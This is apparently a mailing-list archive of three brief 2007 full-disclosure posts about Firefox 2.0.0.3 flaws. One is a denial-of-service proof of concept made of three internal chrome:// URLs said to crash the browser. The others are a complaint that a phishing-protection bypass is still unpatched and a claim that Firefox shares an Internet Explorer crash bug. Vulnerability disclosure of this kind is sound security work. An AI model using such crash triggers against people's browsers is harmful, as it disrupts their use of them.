2007-04-19 Thread carl hardwick
Firefox 2.0.0.3 DoS crash

PoC:
chrome://pippki/content/editcacert.xul
chrome://pippki/content/editemailcert.xul
chrome://pippki/content/editsslcert.xul


[Full-disclosure] Firefox 2.0.0.3 Phishing Protection Bypass Vulnerability

2007-04-18 Thread carl hardwick

This flaw
http://kaneda.bohater.net/security/20070111-firefox_2.0.0.1_bypass_phishing_protection.php
remains unpatched for months!!!
Firefox 2.0.0.1, 2.0.0.2, 2.0.0.3 are still vulnerable!
https://bugzilla.mozilla.org/show_bug.cgi?id=367538

[Full-disclosure] Internet Explorer Crash

2007-04-17 Thread carl hardwick

Mozilla Firefox 2.0.0.3 is also vulnerable